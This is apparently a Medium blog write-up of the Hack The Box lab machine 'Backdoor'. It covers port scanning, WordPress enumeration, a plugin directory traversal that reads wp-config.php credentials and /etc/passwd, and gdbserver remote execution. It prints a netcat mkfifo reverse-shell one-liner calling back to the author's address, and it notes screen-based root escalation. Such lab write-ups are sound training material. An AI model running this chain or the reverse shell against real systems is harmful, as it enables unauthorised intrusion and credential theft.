Write up: Backdoor -HTB

Backdoor

Nmap:

sudo nmap -sC -sV -oA nmap/backdoor 10.10.11.125
[sudo] password for arjun:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-15 04:35 EST
Nmap scan report for 10.10.11.125
Host is up (0.078s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.68 seconds

We can see only two port is open port i.e 22 and 80.SSH is running on port 22 and port 80 is running a WordPress 5.8.1. Beside this is nothing much of importance. So let scan the all the port

Nmap 7.91 scan initiated Tue Dec 14 00:42:51 2021 as: nmap -p- -oA nmap/backdoor 10.10.11.125
Nmap scan report for 10.10.11.125
Host is up (0.28s latency).
Not shown: 65526 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1107/tcp filtered isoipsigport-2
1337/tcp open waste
3018/tcp filtered srvc_registry
23442/tcp filtered unknown
31456/tcp filtered unknown
32504/tcp filtered unknown
35771/tcp filtered unknown

# Nmap done at Tue Dec 14 01:16:30 2021 -- 1 IP address (1 host up) scanned in 2018.88 seconds
Copy

We can see there is another ports that is open

Web:

Let’s keep the wpscan running at background while we manually poke the website

└─$ wpscan --url http://10.10.11.125 -e vp,vt,u                                 
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|

WordPress Security Scanner by the WPScan Team
Version 3.8.18
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.11.125/ [10.10.11.125]
[+] Started: Wed Dec 15 05:46:19 2021

Interesting Finding(s):

[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.11.125/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API

----- snip-------

[i] No themes Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==========================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.11.125/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Dec 15 05:49:30 2021
[+] Requests Done: 411
[+] Cached Requests: 8
[+] Data Sent: 107.312 KB
[+] Data Received: 502.675 KB
[+] Memory used: 233.688 MB
[+] Elapsed time: 00:03:11

We didn't get much information from the wpscan. But it found the user 'admin'

On clicking home, we were redirected to http://backdoor.htb. let’s edit our /etc/hosts file

We didn't found worth mentioning while checking the website so let's fuzz the directory using gobuster

└─$ gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt -u http://backdoor.htb/ -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://backdoor.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/12/15 06:05:39 Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 317] [--> http://backdoor.htb/wp-content/]
/wp-admin (Status: 301) [Size: 315] [--> http://backdoor.htb/wp-admin/]
/wp-includes (Status: 301) [Size: 318] [--> http://backdoor.htb/wp-includes/]
/xmlrpc.php (Status: 405) [Size: 42]
/index.php (Status: 301) [Size: 0] [--> http://backdoor.htb/]
/wp-trackback.php (Status: 200) [Size: 135]
/wp-login.php (Status: 200) [Size: 5674]
/server-status (Status: 403) [Size: 277]
/wp-config.php (Status: 200) [Size: 0]
Progress: 47972 / 60002 (79.95%) [ERROR] 2021/12/15 06:12:04 [!] parse "http://backdoor.htb/error\x1f_log": net/url
: invalid control character in URL

===============================================================
2021/12/15 06:13:38 Finished
===============================================================

/wp-admin is redirected to login page

We can try default credentials and basic SQL injection but it didn’t work. In the meantime, we can start gobuster to fuzz directory at http://backdoor.htb/wp-content

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://backdoor.htb/wp-content
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/12/15 06:18:01 Starting gobuster in directory enumeration mode
===============================================================
/plugins (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/plugins/]
/themes (Status: 301) [Size: 324] [--> http://backdoor.htb/wp-content/themes/]
/uploads (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/uploads/]
/upgrade (Status: 301) [Size: 325] [--> http://backdoor.htb/wp-content/upgrade/]
/index.php

-----------------snip-------

While looking at the /plugins we found ebook-download plugin is installed.

we can see the current version of ebook-download plugin installed from the readme file

After a quick google search at the version, we can find that there is a Directory Traversal vulnerability. You can find the more info at https://www.exploit-db.com/exploits/39575

We can download file using this vulnerability. We were able to get the database credentials from wp-config.php

└─$ cat wp-config.php 

---------------------snip----------------


// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'wordpressuser' );

/** MySQL database password */
define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );\

---------------------snip----------------

/etc/passwd file

└─$ cat passwd                                                                    [6/416]
../../../../../../etc/passwd../../../../../../etc/passwd../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
er:x:1000:1000:user:/home/user:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
<script>window.close()</script>

from the /etc/passwd file we can confirm that there is another user called ‘user'. We can try dumping couple of possible files to find some important information but sadly this wasn't the case. We can try dumping for PIDs

We can use burp intruder to fuzz the PIDs

payload:

While looking at the response we find that gdbserver is running at port 1337

After googling a bit, we can find a Metasploit module which we can use to gain meterpreter shell. you can find more info GDB Server Remote Payload Execution (rapid7.com)

We’ll be skipping Metasploit here, instead we will use gdbserver to gain reverse shell

After reading the documentation about remote debugging programs using gdb. It was clear that we can get reverse shell using gdb debugging. For more information you can visitRemote Debugging (Debugging with GDB) (sourceware.org)

Let’s create a reverse shell file

└─$ cat rev.elf 
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.52 1234 >/tmp/f

shell: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.23 1234 >/tmp/f

Setup the ncat listener

$ nc -lnvp 1234
listening on [any] 1234 ...

now run the gdb, simply running "gdb" command. If gdb is not installed, you can install using apt

command used :

  • target extended-remote 10.10.11.125:1137
  • remote put rev.elf rev.elf
  • set remote exec-file rev.elf
  • show remote exec-file
  • b main
  • run

Voila!, we got the shell. user flag can be found at /home/user

root

first let's swap a tty shell

After swaping tty shell , We can run the command "ps -aux" so that we can get insighted about the running proccess victim’s machine. We can quickly notice that screen have been running on the machine as "SCREEN -dmS root"
After reading on GTFOBins website, there’s a few command that we can take advantage over here. screen | GTFOBins

user@Backdoor:~$ ps -aux | grep SCREEN
ps -aux | grep SCREEN
root 960 0.0 0.1 6952 2320 ? Ss 13:58 0:00 SCREEN -dmS root
user 7490 0.0 0.0 6432 732 pts/1 S+ 14:41 0:00 grep --color=auto SCREEN
user@Backdoor:~$

For those who are not familiar with Screen, it’s a terminal multiplexer which you can start a session with screen and also can open any number of virtual terminals within that session.

--

--

--

Cyber Security Enthusiast| CTF challenge solving | Python programmer

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Basic Python Data Structures: Lists

The Recent Changes in the World of ASP.NET

Numbers in Java

Limit 5 — Implement a Looker Style Guide (LAMS)

Day 4: $CGG Lock-Up

Adventure Continues: CMAF is available in Ant Media Server v2.2

How to Select Enterprise Onboarding Software as a Large Company

gdpr

Auto-Generated Authenticated Python Docs using nbdev and Heroku

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Arjun Aryal

Arjun Aryal

Cyber Security Enthusiast| CTF challenge solving | Python programmer

More from Medium

OverTheWire:~$ Bandit Level 31 → 32

picoCTF — logon

TCMSecurity | Dev | Write-up

TryHackMe Osquery Walk-Through